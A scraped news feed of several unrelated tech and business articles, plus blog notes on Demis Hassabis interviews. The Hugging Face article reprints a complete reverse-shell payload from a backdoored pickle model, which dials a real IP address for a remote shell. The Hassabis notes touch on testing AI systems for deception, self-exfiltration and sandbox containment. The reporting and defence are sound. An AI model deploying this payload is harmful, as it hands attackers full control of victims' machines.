Author name: Mike M.

Report: Boeing may reacquire Spirit at higher price despite hating optics

Still up in the air —

Spirit was initially spun out from Boeing Commercial Airplanes in 2005.

Amid safety scandals involving “many loose bolts” and widespread problems with Boeing’s 737 Max 9s, Boeing is apparently considering buying back Spirit AeroSystems, the key supplier behind some of Boeing’s current manufacturing problems, sources told The Wall Street Journal.

Spirit was initially spun out from Boeing Commercial Airplanes in 2005, and Boeing had planned to keep it that way. Last year, Boeing CEO Dave Calhoun sought to dispel rumors that Boeing might reacquire Spirit as federal regulators launched investigations into both companies. But now Calhoun appears to be “softening that stance,” the WSJ reported.

According to the WSJ’s sources, no deal has taken shape yet, but Spirit has initiated talks with Boeing and “hired bankers to explore strategic options.” Sources also confirmed that Spirit is weighing whether to sell its operations in Ireland, which manufacture parts for Boeing rival Airbus.

Perhaps paving the way for these talks, Spirit replaced its CEO last fall with a former Boeing executive, Patrick Shanahan. In a press release noting that Spirit relies “on Boeing for a significant portion of our revenues,” Spirit touted Shanahan as a “seasoned executive” with 31 years at Boeing, and Shanahan promised to “stabilize” Spirit’s operations.

If Boeing reacquired Spirit, it might help reduce backlash over Boeing’s outsourcing of its plane manufacturing, but it likely wouldn’t help Boeing escape the ongoing scrutiny. While the WSJ reported that “Spirit parts frequently arrive” at the Boeing factory “with defects,” it was “a snafu at Boeing’s factory” that led Alaska Airlines to ground 65 Boeing aircraft over safety concerns after a door plug detached mid-flight, endangering passengers and crew.

Sources later revealed that it was Boeing employees who failed to put bolts back in when they reinstalled a door plug, reportedly causing the malfunction that forced Alaska Airlines to make an emergency landing. As a result, Boeing withdrew a safety exemption it had requested “to prematurely allow the 737 Max 7 to enter commercial service.” At that time, US Sen. Tammy Duckworth (D-Ill.) accused Boeing of a “bold-face attempt to put profits over the safety of the flying public.”

Purchasing Spirit would appear to be a last resort for Boeing, the WSJ reported, noting that so far, “Boeing has done everything short of acquiring Spirit in an effort to gain control over the supplier.”

But Reuters confirmed the WSJ’s report with an industry source, so it seems Boeing increasingly feels it has no other options left, despite working closely with Shanahan for the past few months to keep Spirit’s troubles from impacting Boeing’s bottom line. One industry source told Reuters that in the time since Boeing spun off Spirit, “the optics of buying at a higher price were among the factors that discouraged such a move.”

For Spirit, which attributes nearly two-thirds of its revenues to Boeing, the WSJ reported, being brought back into the Boeing fold could be the only way to survive these turbulent times. Currently valued at about $3.3 billion, Spirit has struggled for months to shore up a commercial agreement with Airbus and notably failed to stabilize after receiving a “$100 million cash infusion from Boeing” last year, the WSJ reported.

But for Boeing, the obvious downside of the purchase would be taking on Spirit’s mess at the same time Boeing is trying to clean up its own image.

Report: Boeing may reacquire Spirit at higher price despite hating optics Read More »

US prescription market hamstrung for 9 days (so far) by ransomware attack

RX CHAOS —

Patients having trouble getting lifesaving meds have the AlphV crime group to thank.

Nine days after a Russian-speaking ransomware syndicate took down the biggest US health care payment processor, pharmacies, health care providers, and patients were still scrambling to fill prescriptions for medicines, many of which are lifesaving.

On Thursday, UnitedHealth Group accused a notorious ransomware gang known both as AlphV and Black Cat of hacking its subsidiary Optum. Optum provides a nationwide network called Change Healthcare, which allows health care providers to manage customer payments and insurance claims. With no easy way for pharmacies to calculate what costs were covered by insurance companies, many had to turn to alternative services or offline methods.

The most serious incident of its kind

Optum first disclosed on February 21 that its services were down as a result of a “cyber security issue.” Its service has been hamstrung ever since. Shortly before this post went live on Ars, Optum said it had restored Change Healthcare services.

“Working with technology and business partners, we have successfully completed testing with vendors and multiple retail pharmacy partners for the impacted transaction types,” an update said. “As a result, we have enabled this service for all customers effective 1 pm CT, Friday, March 1, 2024.”

AlphV is one of many syndicates that operate under a ransomware-as-a-service model, meaning affiliates do the actual hacking of victims and then use the AlphV ransomware and infrastructure to encrypt files and negotiate a ransom. The parties then share the proceeds.

In December, the FBI and its equivalent in partner countries announced they had seized much of the AlphV infrastructure in a move that was intended to disrupt the group. AlphV promptly asserted it had unseized its site, leading to a tug-of-war between law enforcement and the group. The crippling of Change Healthcare is a clear sign that AlphV continues to pose a threat to critical parts of the US infrastructure.

“The cyberattack against Change Healthcare that began on Feb. 21 is the most serious incident of its kind leveled against a US health care organization,” said Rick Pollack, president and CEO of the American Hospital Association. Citing Change Healthcare data, Pollack said that the service processes 15 billion transactions involving eligibility verifications, pharmacy operations, and claims transmittals and payments. “All of these have been disrupted to varying degrees over the past several days and the full impact is still not known.”

Optum estimated that as of Monday, more than 90 percent of roughly 70,000 pharmacies in the US had changed how they processed electronic claims as a result of the outage. The company went on to say that only a small number of patients have been unable to get their prescriptions filled.

The scale and length of the Change Healthcare outage underscore the devastating effects ransomware has on critical infrastructure. Three years ago, members affiliated with a different ransomware group known as Darkside caused a five-day outage of Colonial Pipeline, which delivered roughly 45 percent of the East Coast’s petroleum products, including gasoline, diesel fuel, and jet fuel. The interruption caused fuel shortages that sent airlines, consumers, and filling stations scrambling.

Numerous ransomware groups have also taken down entire hospital networks in outages that in some cases have threatened patient care.

AlphV has been a key contributor to the ransomware menace. The FBI said in December the group had collected more than $300 million in ransoms. Among the better-known victims of AlphV ransomware were Caesars Entertainment and casinos owned by MGM; the attack on the latter brought operations in many Las Vegas casinos to a halt. A group of mostly teenagers is suspected of orchestrating that breach.

US prescription market hamstrung for 9 days (so far) by ransomware attack Read More »

WhatsApp finally forces Pegasus spyware maker to share its secret code

In on the secret —

Israeli spyware maker loses fight to only share information on installation.

WhatsApp will soon be granted access to explore the “full functionality” of the NSO Group’s Pegasus spyware—sophisticated malware the Israeli Ministry of Defense has long guarded as a “highly sought” state secret, The Guardian reported.

Since 2019, WhatsApp has pushed for access to the NSO’s spyware code after alleging that Pegasus was used to spy on 1,400 WhatsApp users over a two-week period, gaining unauthorized access to their sensitive data, including encrypted messages. WhatsApp suing the NSO, Ars noted at the time, was “an unprecedented legal action” that took “aim at the unregulated industry that sells sophisticated malware services to governments around the world.”

Initially, the NSO sought to block all discovery in the lawsuit “due to various US and Israeli restrictions,” but that blanket request was denied. Then, last week, the NSO lost another fight to keep WhatsApp away from its secret code.

As the court considered each side’s motions to compel discovery, a US district judge, Phyllis Hamilton, rejected the NSO’s argument that it should only be required to hand over information about Pegasus’ installation layer.

Hamilton sided with WhatsApp, granting the Meta-owned app’s request for “information concerning the full functionality of the relevant spyware,” writing that “information showing the functionality of only the installation layer of the relevant spyware would not allow plaintiffs to understand how the relevant spyware performs the functions of accessing and extracting data.”

WhatsApp has alleged that Pegasus can “intercept communications sent to and from a device, including communications over iMessage, Skype, Telegram, WeChat, Facebook Messenger, WhatsApp, and others” and that it could also be “customized for different purposes, including to intercept communications, capture screenshots, and exfiltrate browser history.”

To prove this, WhatsApp needs access to “all relevant spyware”—specifically “any NSO spyware targeting or directed at WhatsApp servers, or using WhatsApp in any way to access Target Devices”—for “a period of one year before the alleged attack to one year after the alleged attack,” Hamilton concluded.

The NSO has so far not commented on the order, but WhatsApp was pleased with this outcome.

“The recent court ruling is an important milestone in our long running goal of protecting WhatsApp users against unlawful attacks,” WhatsApp’s spokesperson told The Guardian. “Spyware companies and other malicious actors need to understand they can be caught and will not be able to ignore the law.”

But Hamilton did not grant all of WhatsApp’s requests for discovery, sparing the NSO from sharing specific information regarding its server architecture because WhatsApp “would be able to glean the same information from the full functionality of the alleged spyware.”

Perhaps more significantly, the NSO also won’t be compelled to identify its clients. While the NSO does not publicly name the governments that purchase its spyware, reports indicate that Poland, Saudi Arabia, Rwanda, India, Hungary, and the United Arab Emirates have used it to target dissidents, The Guardian reported. In 2021, the US blacklisted the NSO for allegedly spreading “digital tools used for repression.”

In the same order, Hamilton also denied the NSO’s request to compel WhatsApp to share its post-complaint communications with the Citizen Lab, which served as a third-party witness in the case to support WhatsApp’s argument that “Pegasus is misused by NSO’s customers against ‘civil society.’”

It appeared that the NSO sought WhatsApp’s post-complaint communications with Citizen Lab as a way to potentially pressure WhatsApp into dropping Citizen Lab’s statement from the record. Hamilton quoted a court filing from the NSO that curiously noted: “If plaintiffs would agree to withdraw from their case Citizen Lab’s contention that Pegasus was used against members of ‘civil society’ rather than to investigate terrorism and serious crime, there would be much less need for this discovery.”

Ultimately, Hamilton denied the NSO’s request because “the court fails to see the relevance of the requested discovery.”

As discovery in the case proceeds, the court expects to receive expert disclosures from each side on August 30 before the trial, which is expected to start on March 3, 2025.

WhatsApp finally forces Pegasus spyware maker to share its secret code Read More »

Huge funding round makes “Figure” Big Tech’s favorite humanoid robot company

They’ve got an aluminum CNC machine, and they aren’t afraid to use it —

Investors Microsoft, OpenAI, Nvidia, Jeff Bezos, and Intel value Figure at $2.6B.

The Figure 01 and a few spare parts. Obviously they are big fans of aluminum.

Humanoid robotics company Figure AI announced it raised $675 million in a funding round from an all-star cast of Big Tech investors. The company, which aims to commercialize a humanoid robot, now has a $2.6 billion valuation. Participants in the latest funding round include Microsoft, the OpenAI Startup Fund, Nvidia, Jeff Bezos’ Bezos Expeditions, Parkway Venture Capital, Intel Capital, Align Ventures, and ARK Invest. With all these big-name investors, Figure is officially Big Tech’s favorite humanoid robotics company. The manufacturing industry is taking notice, too. In January, Figure even announced a commercial agreement with BMW to have robots work on its production line.

“In conjunction with this investment,” the press release reads, “Figure and OpenAI have entered into a collaboration agreement to develop next generation AI models for humanoid robots, combining OpenAI’s research with Figure’s deep understanding of robotics hardware and software. The collaboration aims to help accelerate Figure’s commercial timeline by enhancing the capabilities of humanoid robots to process and reason from language.”

With all this hype and funding, the robot must be incredible, right? Well, the company is new and only unveiled its first humanoid “prototype,” the “Figure 01,” in October. At that time, the company said it represented about 12 months of work. With veterans from “Boston Dynamics, Tesla, Google DeepMind, and Archer Aviation,” the company has a strong starting point.

  • Ok, it’s time to pick up a box, so get out your oversized hands and grab hold.

  • Those extra-big hands seem to be the focus of the robot. They are just incredibly complex and look to be aiming at a 1:1 build of a human hand.

  • Just look at everything inside those fingers. It looks like there are tendons of some kind.

  • Not impressed with this “pooped your pants” walk cycle, which doesn’t really use the knees or ankles.

  • A lot of the hardware appears to be waiting for software to use it, like the screen that serves as the robot’s face. It only seems to run a screen saver.

The actual design of the robot appears to be solid aluminum and electrically actuated, aiming for an exact 1:1 match for a human. The website says the goal is a 5-foot 6-inch, 130-lb humanoid that can lift 44 pounds. That’s a very small form-over-function package to try and fit all these robot parts into. For alternative humanoid designs, you’ve got Boston Dynamics’ Atlas, which is more of a hulking beast thanks to the function-over-form design. There’s also the more purpose-built “Digit” from Agility Robotics, which has backward-bending bird legs for warehouse work, allowing it to bend down in front of a shelf without having to worry about the knees colliding with anything.

The best insight into the company’s progress is the official YouTube channel, which shows the Figure 01 robot doing a few tasks. The last video, from a few days ago, showed a robot doing a “fully autonomous” box-moving task at “16.7 percent” of normal human speed. For a bipedal robot, I have to say the walking is not impressive. The Figure 01 has a slow, timid shuffle that only lets it wobble forward at a snail’s pace. The walk cycle is almost entirely driven by the hips. The knees are bent the entire time and always out in front of the robot; the ankles barely move. It seems only to be able to walk in a straight line, and turning is a slow stop-and-spin-in-place motion that has the feet pedaling in place the entire time. The feet seem to move in a constant up-and-down motion even when the robot isn’t moving forward, almost as if foot planning just runs on a set timer for balance. It can walk, but it walks about as slowly and awkwardly as a robot can. A lot of the hardware seems built for software that isn’t ready yet.

Figure seems more focused on the hands than anything. The 01 has giant oversized hands that are a close match for a human’s, with five fingers, all with three joints each. In January, Figure posted a video of the robot working a Keurig coffee maker. That means flipping up the lid with a fingertip, delicately picking up an easily crushable plastic cup with two fingers, dropping it into the coffee maker, casually pushing the lid down with about three different fingers, and pressing the “go” button with a single finger. It’s impressive to not destroy the coffee maker or the K-cup, but that Keurig is still living a rough life—a few of the robot interactions incidentally lift one side or the other of the coffee maker off the table thanks to way too much force.

  • For some very delicate hand work, here’s the Figure 01 making coffee. They went and sourced a silver Keurig machine so this image only contains two colors, black and silver.

  • Time to press the “go” button. Also is that a wrist-mounted lidar puck for vision? Occasionally, flashes of light shoot out of it in the video.

  • These hand close-ups are just incredible. I really do think they are tendon-actuated. You can also see all sorts of pads on the inside of the hand.

  • I love the ridiculous T-pose it assumes while it waits for coffee.

The video says the coffee task was performed via an “end-to-end neural network” using 10 hours of training time. Unlike walking, the hands really feel like they have a human influence when it comes to their movement. When the robot picks up the K-cup via a pinch of its thumb and index finger or goes to push a button, it also closes the other three fingers into a fist. There isn’t a real reason to move the three fingers that aren’t doing anything, but that’s what a human would do, so presumably, it’s in the training data. Closing the lid is interesting because I don’t think you could credit a single finger with the task—it’s just kind of a casual push using whatever fingers connect with the lid. The last clip of the video even shows the Figure 01 correcting a mistake—the K-cup doesn’t sit in the coffee maker correctly, and the robot recognizes this and can poke it around until it falls into place.

A lot of assembly line jobs are done at a station or sitting down, so the focus on hand dexterity makes sense. Boston Dynamics’ Atlas is way more impressive as a walking robot, but that’s also a multi-million dollar research bot that will never see the market. Figure’s goal, according to the press release, is to “bring humanoid robots into commercial operations as soon as possible.” The company openly posts a “master plan” on its website, which reads, “1) Build a feature-complete electromechanical humanoid. 2) Perform human-like manipulation. 3) Integrate humanoids into the labor force.” The robots are coming for our jobs.

Huge funding round makes “Figure” Big Tech’s favorite humanoid robot company Read More »

Apple changes course, will keep iPhone EU web apps how they are in iOS 17.4

Digital Markets Act —

Alternative browsers can pin web apps, but they only run inside Apple’s WebKit.

EU legislation has pushed a number of changes previously thought unthinkable in Apple products, including USB-C ports in iPhones sold in Europe.

Apple has changed its stance on allowing web apps on iPhones and iPads in Europe and will continue to let users put them on their home screens after iOS 17.4 arrives. They will, however, have to be “built directly on WebKit and its security architecture,” rather than running in alternative browsers, which is how it had worked up until new legislation forced the issue.

After the European Union’s Digital Markets Act (DMA) demanded Apple open up its mobile devices to alternative browser engines, the company said it would remove the ability to install home screen web apps entirely. In a developer Q&A section, under the heading “Why don’t users in the EU have access to Home Screen web apps?”, Apple said that “the complex security and privacy concerns” of non-native web apps and what addressing them would require “given the other demands of the DMA and the very low user adoption of Home Screen web apps,” made it so that the company “had to remove the Home Screen web apps feature in the EU.” Any web app installed on a user’s home screen would have simply led them back to their preferred web browser.

Apple further warned against “malicious web apps,” which, without the isolation built into its WebKit system, could read data, steal permissions from other web apps, and install further web apps without permission, among other concerns.

That response prompted an inquiry by European Commission officials, who asked Apple and app developers about the impact of a potential removal of home screen web apps. It also prompted a survey conducted by the Open Web Advocacy group. Apple has until March 6 to comply with the DMA. Apple’s move to block web apps entirely suggested that allowing web apps powered by Safari, but not other browser engines, might violate the DMA’s rules. Now, some aspect of that cautious approach has changed.

Under an updated version of that section heading, Apple reiterates its security and privacy concerns and the need to “build new integration architecture that does not currently exist in iOS.” But because of requests to continue web app offerings, “we will continue to offer the existing Home Screen capability in the EU,” Apple writes.

The long, weird road to where web apps are now

Apple has long offered web apps (or Progressive Web Apps) that opened as a separate application rather than in a browser tab. Web apps installed this way offer greater persistence and access to device features, like notifications, cameras, or file storage. Web apps were initially touted by Apple co-founder and then-CEO Steve Jobs as “everything you need” to write “amazing apps” rather than dedicated apps with their own SDK. Four months later, an iPhone SDK was announced, and Apple declared its enthusiastic desire for “native third-party applications on the iPhone.”

While Apple does not break out App Store revenues in its earnings statements, its Services division recorded an all-time high of $22.3 billion in the company’s fourth quarter of 2023, including “all time revenue records” across the App Store and other offerings.

As part of its DMA compliance as a “gatekeeper” of certain systems, Apple must also allow sideloading for EU customers, meaning the installation of iOS apps from stores other than its own official App Store. This week, more than two dozen companies signed a letter to the Commission lamenting Apple’s implementation of App Store rules. Developers seeking to utilize alternative app stores will have to agree to terms that include a “Core Technology Fee,” demanding a 0.50 euro fee for each app, each year, after 1 million downloads. “Few app developers will agree to these unjust terms,” the letter claims, and will thereby further “Apple’s exploitation of its dominance over app developers.”

In a statement provided to Ars, Apple said that its “approach to the Digital Markets Act was guided by two simple goals: complying with the law and reducing the inevitable, increased risks the DMA creates for our EU users.” It noted that Apple employees “spent months in conversation with the European Commission,” and had “in little more than a year, created more than 600 new APIs and a wide range of developer tools.” Still, Apple said, the changes and safeguards it put in place can’t entirely “eliminate new threats the DMA creates,” and the changes “will result in a less secure system.”

That is why, Apple said, it is limiting third-party browser engines, app stores, and other DMA changes to the European Union. “[W]e’re concerned about their impacts on the privacy and security of our users’ experience—which remains our North Star.”

Apple changes course, will keep iPhone EU web apps how they are in iOS 17.4 Read More »

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

Secrets and other bait data the honeypot used to attract the threat actor.

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickle is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity to sneak malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.
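
The risk is easy to demonstrate with a harmless stand-in. The sketch below is purely illustrative and is not code from the flagged models; it simply shows that whatever callable __reduce__ returns gets executed the moment the bytes are unpickled.

import pickle

class Demo:
    # __reduce__ tells pickle how to rebuild the object. Whatever callable
    # it returns is invoked during unpickling, which is why loading an
    # untrusted pickle can run arbitrary code.
    def __reduce__(self):
        return (print, ("this ran during pickle.loads()",))

blob = pickle.dumps(Demo())
pickle.loads(blob)  # prints the message instead of returning a Demo object

Swap print for something like os.system or a socket connection and the same hook becomes a backdoor, which is essentially what the flagged model did.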

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"
RPORT = 4242

from sys import platform

if platform != 'win32':
    import threading
    import socket
    import pty
    import os

    def connect_and_spawn_shell():
        s = socket.socket()
        s.connect((RHOST, RPORT))
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")

    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os
    import socket
    import subprocess
    import threading
    import sys

    def send_to_process(s, p):
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()

    def receive_from_process(s, p):
        while True:
            s.send(p.stdout.read(1).encode())

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            s.connect((RHOST, RPORT))
            break
        except:
            pass

    p = subprocess.Popen(["powershell.exe"],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)

    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()
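
For anyone who wants to vet a downloaded checkpoint before loading it, one low-risk option is to disassemble the embedded pickle stream instead of executing it. The following is a minimal sketch, assuming the file is a standard torch.save() zip archive; the filename is hypothetical.

import pickletools
import zipfile

# A checkpoint written by torch.save() is a zip archive whose pickle stream
# lives in a member ending in "data.pkl". Disassembling that stream lists
# every GLOBAL/REDUCE opcode, so suspicious imports such as "socket" or
# "posix system" stand out without anything being deserialized.
MODEL_PATH = "suspect_model.bin"  # hypothetical path to the downloaded file

with zipfile.ZipFile(MODEL_PATH) as zf:
    pkl_name = next(n for n in zf.namelist() if n.endswith("data.pkl"))
    with zf.open(pkl_name) as fh:
        pickletools.dis(fh)  # prints opcodes only; nothing is executed

Newer PyTorch releases also accept torch.load(..., weights_only=True), which refuses to unpickle anything beyond plain tensor data, and the fickling tool mentioned above automates this kind of inspection.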

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit

It looks like Elon Musk may lose X’s lawsuit against hate speech researchers who encouraged a major brand boycott after flagging ads appearing next to extremist content on X, the social media site formerly known as Twitter.

X is trying to argue that the Center for Countering Digital Hate (CCDH) violated the site’s terms of service and illegally accessed non-public data to conduct its reporting, allegedly posing a security risk for X. The boycott, X alleged, cost the company tens of millions of dollars by spooking advertisers, while X contends that the CCDH’s reporting is misleading and ads are rarely served on extremist content.

But at a hearing Thursday, US District Judge Charles Breyer told the CCDH that he would consider dismissing X’s lawsuit, repeatedly appearing to mock X’s decision to file it in the first place.

Seemingly skeptical of X’s entire argument, Breyer appeared particularly focused on how X intended to prove that the CCDH could have known that its reporting would trigger such substantial financial losses, as the lawsuit hinges on whether the alleged damages were “foreseeable,” NPR reported.

X’s lawyer, Jon Hawk, argued that when the CCDH joined Twitter in 2019, the group agreed to terms of service that noted those terms could change. So when Musk purchased Twitter and updated rules to reinstate accounts spreading hate speech, the CCDH should have been able to foresee those changes in terms and therefore anticipate that any reporting on spikes in hate speech would cause financial losses.

According to CNN, this is where Breyer became frustrated, telling Hawk, “I’m trying to figure out in my mind how that’s possibly true, because I don’t think it is.”

“What you have to tell me is, why is it foreseeable?” Breyer said. “That they should have understood that, at the time they entered the terms of service, that Twitter would then change its policy and allow this type of material to be disseminated?

“That, of course, reduces foreseeability to one of the most vapid extensions of law I’ve ever heard,” Breyer added. “‘Oh, what’s foreseeable is that things can change, and therefore, if there’s a change, it’s ‘foreseeable.’ I mean, that argument is truly remarkable.”

According to NPR, Breyer suggested that X was trying to “shoehorn” its legal theory by using language from a breach of contract claim, when what the company actually appeared to be alleging was defamation.

“You could’ve brought a defamation case; you didn’t bring a defamation case,” Breyer said. “And that’s significant.”

Breyer directly noted that one reason why X might not bring a defamation suit was if the CCDH’s reporting was accurate, NPR reported.

CCDH’s CEO and founder, Imran Ahmed, provided a statement to Ars, confirming that the group is “very pleased with how yesterday’s argument went, including many of the questions and comments from the court.”

“We remain confident in the strength of our arguments for dismissal,” Ahmed said.

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit Read More »

Notes on Dwarkesh Patel’s Podcast with Demis Hassabis

Demis Hassabis was interviewed twice this past week.

First, he was interviewed on Hard Fork. Then he had a much more interesting interview with Dwarkesh Patel.

This post covers my notes from both interviews, mostly the one with Dwarkesh.

Hard Fork was less fruitful, because they mostly asked what for me are the wrong questions and mostly got answers I presume Demis has given many times. So I only noticed two things, neither of which is ultimately surprising.

  1. They do ask about The Gemini Incident, although only about the particular issue with image generation. Demis gives the generic ‘it should do what the user wants and this was dumb’ answer, which I buy he likely personally believes.

  2. When asked about p(doom) he expresses dismay about the state of discourse and says around 42:00 that ‘well Geoffrey Hinton and Yann LeCun disagree so that indicates we don’t know, this technology is so transformative that it is unknown. It is nonsense to put a probability on it. What I do know is it is non-zero, that risk, and it is worth debating and researching carefully… we don’t want to wait until the eve of AGI happening.’ He says we want to be prepared even if the risk is relatively small, without saying what would count as small. He also says he hopes in five years to give us a better answer, which is evidence against him having super short timelines.

I do not think this is the right way to handle probabilities in your own head. I do think it is plausibly a smart way to handle public relations around probabilities, given how people react when you give a particular p(doom).

I am of course deeply disappointed that Demis does not think he can differentiate between the arguments of Geoffrey Hinton versus Yann LeCun, and the implied importance on the accomplishments and thus implied credibility of the people. He did not get that way, or win Diplomacy championships, thinking like that. I also don’t think he was being fully genuine here.

Otherwise, this seemed like an inessential interview. Demis did well but was not given new challenges to handle.

Demis Hassabis also talked to Dwarkesh Patel, which is of course self-recommending. Here you want to pay attention, and I paused to think things over and take detailed notes. Five minutes in I had already learned more interesting things than I did from the entire Hard Fork interview.

Here is the transcript, which is also helpful.

  1. (1:00) Dwarkesh first asks Demis about the nature of intelligence, whether it is one broad thing or the sum of many small things. Demis says there must be some common themes and underlying mechanisms, although there are also specialized parts. I strongly agree with Demis. I do not think you can understand intelligence, of any form, without some form of the concept of G.

  2. (1:45) Dwarkesh follows up by asking then why doesn’t lots of data in one domain generalize to other domains? Demis says often it does, such as coding improving reasoning (which also happens in humans), and he expects more chain transfer.

  3. (4:00) Dwarkesh asks what insights neuroscience brings to AI. Demis points to many early AI concepts. Going forward, questions include how brains form world models or memory.

  4. (6:00) Demis thinks scaffolding via tree search or AlphaZero-style approaches for LLMs is super promising. He notes they’re working hard on search efficiency in many of their approaches so they can search further.

  5. (9:00) Dwarkesh notes that Go and Chess have clear win conditions, real life does not, asks what to do about this. Demis agrees this is a challenge, but that usually ‘in scientific problems’ there are ways to specify goals. Suspicious dodge?

  6. (10:00) Dwarkesh notes humans are super sample efficient, Demis says it is because we are not built for Monte Carlo tree search, so we use our intuition to narrow the search.

  7. (12:00) Demis is optimistic about LLM self-play and synthetic data, but we need to do more work on what makes a good data set – what fills in holes, what fixes potential bias and makes it representative of the distribution you want to learn. Definitely seems underexplored.

  8. (14:00) Dwarkesh asks what techniques are underrated now. Demis says things go in and out of fashion, that we should bring back old ideas like reinforcement and Q learning and combine them with the new ones. Demis really believes games are The Way, it seems.

  9. (15:00) Demis thinks AGI could in theory come from full AlphaZero-style approaches and some people are working on that, with no priors, which you can then combine with known data, and he doesn’t see why you wouldn’t combine planning search with outside knowledge.

  10. (16:45) Demis notes everyone has been surprised how well scaling hypothesis has held up and systems have gotten grounding and learned concepts, and that language and human feedback can contain so much grounding. From Demis: “I think we’ve got to push scaling as hard as we can, and that’s what we’re doing here. And it’s an empirical question whether that will hit an asymptote or a brick wall, and there are different people argue about that. But actually, I think we should just test it. I think no one knows. But in the meantime, we should also double down on innovation and invention.” He’s roughly splitting his efforts in half, scaling versus new ideas. He’s taking the ‘hit a wall’ hypothesis seriously.

  11. (20:00) Demis says systems need to be grounded (in the physical world and its causes and effects) to achieve their goals and various advances are forms of this grounding, systems will understand physics better, references need for robotics.

  12. (21:30) Dwarkesh asks about the other half, grounding in human preferences, what it takes to align a system smarter than humans. Demis says that has been at the forefront of his and Shane’s minds since before founding DeepMind, they had to plan for success and ensure systems are understandable and controllable. The part that addresses details:

Demis Hassabis: And I think there are sort of several, this will be a whole sort of discussion in itself, but there are many, many ideas that people have from much more stringent eval systems. I think we don’t have good enough evaluations and benchmarks for things like, can the system deceive you? Can it exfiltrate its own code, sort of undesirable behaviors?

And then there are ideas of actually using AI, maybe narrow AIs, so not general learning ones, but systems that are specialized for a domain to help us as the human scientists analyze and summarize what the more general system is doing. Right. So kind of narrow AI tools.

I think that there’s a lot of promise in creating hardened sandboxes or simulations that are hardened with cybersecurity arrangements around the simulation, both to keep the AI in, but also as cybersecurity to keep hackers out. And then you could experiment a lot more freely within that sandbox domain.

And I think a lot of these ideas are, and there’s many, many others, including the analysis stuff we talked about earlier, where can we analyze and understand what the concepts are that this system is building, what the representations are, so maybe they’re not so alien to us and we can actually keep track of the kind of knowledge that it’s building.

It has been over fourteen years of thinking hard about these questions, and this is the best Demis has been able to come up with. They’re not bad ideas. Incrementally they seem helpful. They don’t constitute an answer or full path to victory or central form of a solution. They are more like a grab bag of things one could try incrementally. We are going to need to do better than that.

  1. (24:00) Dwarkesh asks timelines, notes Shane said median of 2028. Demis sort of dodges and tries to not get pinned down but implies AGI-like systems are on track for 2030 and says he wouldn’t be surprised to get them ‘in the next decade.’

  2. (25:00) Demis agrees AGI accelerating AI (RSI) is possible, says it depends on what we use the first AGI systems for, warning of the safety implications. The obvious follow-up question is: How would society make a choice to not use the first AGI systems for exactly this? He needs far more understanding to know even what we would need to know to know if this feedback loop was imminent.

  3. (26:30) Demis notes deception is a root node that you very much do not want, ideally you want the AGI to give you post-hoc explanations. I increasingly think people are considering ‘deception’ as distinct from non-deception in a way that does not reflect reality, and it is an expensive and important confusion.

  4. (27:40): Dwarkesh asks, what observations would it take to make Demis halt training of Gemini 2 because it was too dangerous? Demis answers reasonably but generically, saying we should test in sandboxes for this reason and that such issues might come up in a few years but aren’t of concern now, that the system lying about defying our instructions might be one trigger. And that then you would, ideally, ‘pause and get to the bottom of why it was doing those things’ before continuing. More conditional alarm, more detail, and especially more hard commitment, seems needed here.

  5. (28:50) Logistical barriers are the main reason Gemini didn’t scale bigger, also you need to adjust all your parameters and go incrementally, not go more than one order of magnitude at a time. You can predict ‘training loss’ farther out but that does not tell you about actual capabilities you care about. A surprising thing about Gemini was the relationship between scoring on target metrics versus ultimate practical capabilities.

